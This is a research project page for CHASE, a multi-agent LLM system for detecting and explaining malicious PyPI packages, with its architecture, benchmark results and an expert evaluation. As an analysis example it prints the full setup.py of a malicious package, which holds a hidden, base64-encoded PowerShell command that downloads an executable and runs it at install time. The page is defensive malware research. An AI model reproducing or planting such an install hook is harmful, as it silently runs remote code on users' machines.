AIware 2025

CHASE: LLM Agents for Dissecting Malicious PyPI Packages

1Waseda University, 2RIKEN AIP, 3NICT
CHASE System Overview

Abstract

Modern software package registries like PyPI have become critical infrastructure for software development, but are increasingly exploited by threat actors distributing malicious packages with sophisticated multi-stage attack chains. While Large Language Models (LLMs) offer promising capabilities for automated code analysis, their application to security-critical malware detection faces fundamental challenges, including hallucination and context confusion, which can lead to missed detections or false alarms.

We present CHASE (Collaborative Hierarchical Agents for Security Exploration), a high-reliability multi-agent architecture that addresses these limitations through:

  • A Plan-and-Execute workflow for analysis stablity
  • Specialized Worker Agents focused on specific analysis aspects
  • Integration with deterministic security tools for critical operations

Our key insight is that reliability in LLM-based security analysis emerges not from improving individual model capabilities but from architecting systems that compensate for LLM weaknesses while leveraging their semantic understanding strengths.

Why CHASE?

Existing detection methods face a fundamental limitation: they can identify where suspicious code exists, but struggle to accurately explain what it actually does.

Capability MalGuard GuardDog CHASE
Detection Performance Strong Limited Strong
Where is suspicious?
What does it do? Conditional* Conditional*

* MalGuard and GuardDog generate explanations by mapping detected function names to pre-written descriptions. While useful, this provides a post-hoc summary of known suspicious patterns. In contrast, CHASE actively intervenes on code by deobfuscating layered payloads and reasoning over analysis traces to reveal the true intent.

CHASE actively deobfuscates layered payloads and retrieves remote content to reveal the attacker's true intent, producing high-fidelity, actionable reports that include:

  • Attack chain reconstruction
  • Attacker's ultimate goal
  • Indicators of Compromise (IoCs)

Quantitative Results

Evaluated on a dataset of 3,000 real-world packages (500 malicious, 2,500 benign):

Method Precision Recall F1
MalGuard (RF) 0.972 0.922 0.946
GuardDog 0.675 0.854 0.754
CHASE (Ours) 0.996 0.984 0.990

Architecture

CHASE's design is inspired by how human security experts analyze malicious code. Professional analysts dynamically switch between exploratory activities (surveying code to form hypotheses, performed by Supervisor) and exploitative activities (focusing on specific tasks like deobfuscation, performed by Workers).

The multi-agent architecture of CHASE, using a Plan-and-Execute
                    workflow and a Supervisor-Worker model.

Design Principles

1. Supervisor-Worker Multi-Agent Architecture

A single Supervisor agent maintains the global analysis perspective, while specialized Worker agents execute domain-specific tasks:

  • Deobfuscator: Handles code deobfuscation, decryption, and safe execution
  • Web Researcher: Investigates external resources and queries threat intelligence

2. Plan-and-Execute Workflow

Unlike simple reactive approaches that get trapped in repetitive failures, CHASE's Supervisor dynamically adjusts its analysis plan based on Worker results—crucial for malware analysis where outcomes are unpredictable.

3. Reliability-Oriented Coordination

  • State-Based Communication: Avoids context poisoning by maintaining all information in a central state variable
  • Minimal Toolsets: Each Worker has only the tools it needs, preventing cognitive overload
  • Budget-Aware Planning: Prevents potential infinite loops in multi-agent systems

Analysis Example

The following trace shows CHASE analyzing libstrreplacecpu-7.3, a malicious package that downloads and executes a malicious executable via an obfuscated PowerShell command.

The analysis trace for libstrreplacecpu-7.3 as generated by CHASE.

Step-by-Step Analysis

Step 1

Supervisor creates an initial plan after observing the raw source code

Step 2

Supervisor delegates the obfuscated PowerShell command to Deobfuscator

Step 3

Deobfuscator decrypts the base64 payload, revealing a Dropbox download URL

Step 4

Supervisor updates the plan based on the new finding

Step 5

Web Researcher investigates the URL via VirusTotal — flagged by 7/63 vendors

Step 6

Web Researcher investigates the author's email and suspicious domain

Step 7

Supervisor compiles the final analysis report

Raw Sourcecode in libstrreplacecpu-7.3

Click to expand the full code of setup.py
                  from distutils.core import setup

try:
  import subprocess
  import os
  if not os.path.exists('tahg'):
    # www.esquelesquad.rip
    subprocess.Popen('powershell -WindowStyle Hidden -EncodedCommand cABvAHcAZQByAHMAaABlAGwAbAAgAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAiAGgAdAB0AHAAcwA6AC8ALwBkAGwALgBkAHIAbwBwAGIAbwB4AC4AYwBvAG0ALwBzAC8AcwB6AGcAbgB5AHQAOQB6AGIAdQBiADAAcQBtAHYALwBFAHMAcQB1AGUAbABlAC4AZQB4AGUAPwBkAGwAPQAwACIAIAAtAE8AdQB0AEYAaQBsAGUAIAAiAH4ALwBXAGkAbgBkAG8AdwBzAEMAYQBjAGgAZQAuAGUAeABlACIAOwAgAEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgACIAfgAvAFcAaQBuAGQAbwB3AHMAQwBhAGMAaABlAC4AZQB4AGUAIgA=', shell=False, creationflags=subprocess.CREATE_NO_WINDOW)
except: pass
try:
  setup(
    name = 'libstrreplacecpu',
    packages = ['modlib'],
    version = '3.42',
    # license='MIT',
    description = 'A library for creating a terminal user interface',
    author = 'EsqueleSquad',
    author_email = 'tahgoficial@proton.me',
    classifiers=[
      'Development Status :: 3 - Alpha',
      'Intended Audience :: Developers',
      'Topic :: Software Development :: Build Tools',
      'License :: OSI Approved :: MIT License',
      'Programming Language :: Python :: 3',
      'Programming Language :: Python :: 3.4',
      'Programming Language :: Python :: 3.5',
      'Programming Language :: Python :: 3.6',
      'Programming Language :: Python :: 3.7',
      'Programming Language :: Python :: 3.8',
      'Programming Language :: Python :: 3.9',
      'Programming Language :: Python :: 3.10',
      'Programming Language :: Python :: 3.11',
    ],
  )
except: pass
                

Generated Report

Click to expand the full generated report

Model Configuration

CHASE employs a tiered hierarchy of local LLMs via SGLang to balance capability with cost:

Role Model Purpose
Supervisor Qwen/Qwen3-32B Multi-step reasoning, plan orchestration
Workers Qwen/Qwen3-8B Focused, domain-specific tasks
Formatter google/gemma-3-4b-it JSON output conversion

This configuration runs on a single NVIDIA H100 NVL, making it economically feasible for continuous monitoring.

Expert Evaluation

We conducted a user study with three cybersecurity professionals (security strategist, red team engineer, threat intelligence analyst) to evaluate the quality of CHASE-generated reports for three packages (one benign, two malicious) across five dimensions:

Dimension Benign Malicious 1 Malicious 2
Accuracy 3.6 3.8 3.7
Completeness 2.9 4.0 4.2
Clarity 4.1 3.9 4.3
Actionability 3.1 4.0 3.8
Reliability 3.0 4.0 4.0

(5-point Likert scale: 1 = Strongly Disagree, 5 = Strongly Agree)

Key Findings

Strong ratings for Completeness of threat overview and Clarity of terminology

Tendency to over-assess risks in benign code (generating overly cautious warnings)

Evaluations varied by professional role — threat analysts rated highest, red team engineers requested more technical precision

BibTeX

@inproceedings{toda2025CHASE,
author       = {Toda, Takaaki and Mori, Tatsuya},
title        = {{ CHASE: LLM Agents for Dissecting Malicious PyPI Packages }},
booktitle    = {2025 2nd IEEE/ACM International Conference on AI-powered Software (AIware)},
pages        = {1-10},
publisher    = {IEEE},
year         = {2025},
doi          = {10.1109/AIware69974.2025.00008},
url          = {https://doi.ieeecomputersociety.org/10.1109/AIware69974.2025.00008},
}

Acknowledgments

A part of this work is based on the results obtained from a project, JPNP24003, commissioned by the New Energy and Industrial Technology Development Organization (NEDO).